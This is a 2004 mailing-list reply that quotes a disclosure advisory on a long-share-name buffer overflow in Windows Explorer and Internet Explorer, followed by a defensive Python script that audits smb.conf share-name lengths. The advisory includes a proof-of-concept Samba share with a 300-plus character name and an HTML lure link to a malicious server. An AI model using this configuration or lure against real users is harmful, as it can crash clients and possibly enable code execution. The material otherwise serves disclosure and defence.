Message-ID: <20040426205555.11428.qmail@web12702.mail.yahoo.com>
From: dan57170 at yahoo.com (Daniel Regalado Arias)
Subject: Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow.
Well, I have tested it in W2k with SP3 and Explorer didn't crash!!!!!!!
Well, I can't get into the share because a message appears saying "share name not found"!!!!
But Explorer is OK.
--- Rodrigo Gutierrez <rodrigo@...ellicomp.cl> wrote:
> Sunday afternoon is a bit boring, and the weather sucks
> down here in Santiago, Chile so here we go...
> The vuln is attached in TXT format, I would be
> grateful if someone could verify if it affects Windows 2003 as well.
>
> Rodrigo.-
> Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow.
>
>
>
> Author: Rodrigo Gutierrez <rodrigo@...ellicomp.cl>
>
> Affected: MS Internet Explorer, MS Explorer (explorer.exe)
> Windows XP (All), Windows 2000 (All)
>
> Not Tested: Windows 2003, Windows ME, Windows 98, Windows 95
>
> Vendor Status: I notified the vendor in the beginning of 2002; this
> vulnerability was supposed to be fixed in XP Service Pack 1 according
> to the vendor's knowledge base article 322857.
>
> Vendor URL:
> http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
>
>
>
> Background.
>
> MS Explorer (explorer.exe) and MS Internet Explorer (IEXPLORE.EXE) are
> core pieces of Microsoft Windows operating systems.
>
>
>
> Description
>
> Windows fails to handle long share names when accessing remote file
> servers such as Samba, allowing a malicious server to crash the
> client's Explorer and eventually execute arbitrary code on the
> machine as the current user (usually with Administrator rights on
> Windows machines).
>
>
>
> Analysis
>
> In order to exploit this, an attacker must be able to get a user to
> connect to a malicious server which contains a share name equal to or
> longer than 300 characters. Windows won't allow you to create such a
> share, but of course Samba includes the feature ;). After your Samba
> box is up and running, create a share in your smb.conf:
>
>
>
> #------------ CUT HERE -------------
>
> [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> comment = Area 51
> path = /tmp/testfolder
> public = yes
> writable = yes
> printable = no
> browseable = yes
> write list = @trymywingchung
>
> #------------ CUT HERE -------------
>
>
> After your server is up, just get to your Windows test box and go to
> Start menu > Run > \\your.malicious.server.ip., plufff, Explorer will
> crash :).
>
> Social Engineering:
>
> <a href="\\my.malicious.server.ip">Enter My 0day sploit archive</a>
>
>
>
> Workaround.
>
> From your network card settings, disable the Client for Microsoft
> Networks until a real fix for this vulnerability is available.
>
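A defender-side check for the share-name length the quoted advisory describes, added here as an example and not part of either post: a minimal smb.conf parser that reports any share whose name is at least 300 characters long (the advisory's threshold). The sample configuration is constructed, and the parser only handles section headers, `key = value` lines and `#`/`;` comments, which is all the quoted config uses; the `global` section is skipped because it is not a share.

```python
"""Audit an smb.conf for share names long enough to trigger the client
crash described in the advisory (300 characters or more)."""
import re
from typing import Dict, List, Tuple

# Threshold named in the advisory: a share name of 300+ characters.
CRASH_LENGTH = 300

SECTION_RE = re.compile(r"^\[(?P<name>[^\]]*)\]$")
KV_RE = re.compile(r"^(?P<key>[^=]+?)\s*=\s*(?P<value>.*)$")


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Return {section_name: {param: value}} for a minimal smb.conf.

    Handles [section] headers, 'key = value' lines and '#'/';' comments,
    which is all the advisory's sample share uses."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group("name")
            sections.setdefault(current, {})
            continue
        m = KV_RE.match(line)
        if m and current is not None:
            key = m.group("key").strip().lower()
            sections[current][key] = m.group("value").strip()
    return sections


def audit_share_names(sections: Dict[str, Dict[str, str]],
                      max_len: int = CRASH_LENGTH) -> List[Tuple[str, int]]:
    """Return (name preview, length) for every share whose name reaches
    max_len. 'global' is server-wide configuration, not a share."""
    findings = []
    for name in sections:
        if name.lower() == "global":
            continue
        if len(name) >= max_len:
            findings.append((name[:16] + "...", len(name)))
    return findings


def audit_text(text: str, max_len: int = CRASH_LENGTH) -> List[Tuple[str, int]]:
    """Parse and audit an smb.conf given as a string."""
    return audit_share_names(parse_smb_conf(text), max_len)


# Constructed sample config mirroring the advisory's layout: one ordinary
# share and one whose name is 320 characters of 'A'.
SAMPLE_CONF = (
    "[global]\n"
    "   workgroup = TESTLAB\n"
    "\n"
    "[public]\n"
    "   path = /srv/public\n"
    "   browseable = yes\n"
    "\n"
    "; share with an overlong name, as in the advisory\n"
    "[" + "A" * 320 + "]\n"
    "   comment = Area 51\n"
    "   path = /tmp/testfolder\n"
    "   browseable = yes\n"
    "   write list = @trymywingchung\n"
)

if __name__ == "__main__":
    for preview, length in audit_text(SAMPLE_CONF):
        print(f"share {preview} has a {length}-character name "
              f"(>= {CRASH_LENGTH}, client crash length from the advisory)")
```

Run it against a real smb.conf with `audit_text(open("/etc/samba/smb.conf").read())`; lowering `max_len` gives an early warning for names that are merely unusual rather than crash-length.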